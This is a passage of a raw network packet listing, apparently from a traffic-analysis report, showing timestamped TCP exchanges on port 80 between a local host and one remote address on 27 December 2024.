                                                      Dec 27, 2024 09:07:44.664109945 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664120913 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664118052 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664144039 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664186954 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664195061 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664237022 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664263964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664274931 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664326906 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664340973 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664352894 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664365053 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.783828974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783844948 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783864021 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783873081 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783890963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.783915997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783926010 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.783942938 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.783958912 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.827691078 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.827817917 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.943660975 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.943742037 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.987652063 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.103703022 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.103759050 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.303611040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.303667068 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.543704033 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.543792963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.566395044 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.566603899 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.566668034 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.663368940 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.663435936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686336040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686371088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686383963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686400890 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686471939 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686510086 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686532974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686690092 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686733961 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686748981 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686779022 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686882019 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686899900 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686923027 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686958075 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687031031 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687134027 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687171936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687190056 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687278032 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687396049 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687442064 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687614918 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687673092 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687699080 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687738895 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687784910 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688033104 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688191891 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688309908 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688446999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688604116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688826084 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688941956 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689112902 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689218998 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689287901 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689348936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689376116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689450026 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689490080 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689632893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689660072 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689677000 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689694881 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689804077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689846039 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689861059 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.690247059 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.731622934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.731817007 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.783168077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.783288956 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.805942059 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806019068 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806034088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806117058 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806132078 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806267023 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806268930 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806346893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806432962 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806621075 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806729078 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806826115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806906939 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807001114 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807061911 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807188034 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807324886 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807356119 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807446957 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807478905 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807693958 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.808904886 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.808934927 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.808943033 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.808979988 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809079885 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809114933 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809132099 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809154034 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809169054 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809197903 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809232950 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809416056 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809426069 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809458017 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809472084 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809529066 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809545994 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809580088 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809602022 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809628963 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809645891 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809663057 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809684992 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809763908 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809813023 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809837103 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809931040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809940100 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809974909 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810039043 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810128927 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810146093 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810235023 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810333967 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810343027 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810350895 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810466051 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810511112 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810551882 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810606003 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810700893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810709953 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810817003 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810827017 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810899973 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810909033 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810964108 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810987949 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811079025 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811098099 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811175108 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811302900 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811317921 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811327934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811338902 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.851367950 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.902848005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.902954102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925443888 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925576925 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925590038 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925733089 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925770044 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925854921 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925882101 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.926136971 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.926206112 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.927213907 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927233934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927350998 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927419901 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927429914 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927464962 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927577972 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927613974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927757025 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927766085 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927875042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927894115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928046942 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928056955 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928111076 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928136110 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928261042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928270102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928369999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928432941 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928550005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928558111 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928644896 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928689957 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928780079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928860903 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929030895 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929040909 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929193974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929238081 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929279089 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929397106 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929405928 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929425955 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929491997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929502964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929606915 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929616928 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929698944 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929735899 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929908991 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929919004 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930005074 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930039883 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930128098 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930175066 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930257082 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930294037 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930378914 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930389881 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930474997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930485964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930648088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930732965 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.931967974 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.932029963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:46.046199083 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046277046 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046343088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046353102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046360016 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046369076 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046461105 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046473026 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046570063 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046674013 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046777964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046832085 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046957970 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047002077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047106981 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047132969 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047285080 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047307014 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047466040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047498941 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047584057 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047621965 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047734022 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047745943 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047818899 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047844887 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047919989 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047960997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048057079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048100948 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048140049 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048183918 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048221111 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048285007 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048394918 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048403978 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048526049 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048578024 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048652887 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048698902 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048851967 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048877954 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048983097 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048994064 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049063921 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049077034 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049196959 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049236059 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049336910 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049345970 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049441099 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049469948 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049557924 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049585104 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.049938917 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:46.050033092 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:46.051666021 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.051682949 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.051781893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.051814079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.051913977 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.051984072 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052028894 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052071095 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052191973 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052212000 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052356005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052365065 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052407980 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052478075 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052519083 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052583933 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052649021 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052719116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052748919 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052836895 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052921057 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.052930117 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053076029 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053102016 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053220987 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053282976 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053354979 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053380013 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053432941 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053488016 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053594112 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053603888 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053678989 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053699017 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053829908 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053857088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053925037 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.053935051 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054024935 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054034948 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054097891 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054172993 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054275036 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054284096 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054302931 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054353952 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054465055 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054474115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054497957 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054557085 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054605961 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054673910 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054716110 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.054831982 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.055083990 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:46.169786930 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.169810057 CET80497275.101.3.217192.168.2.9
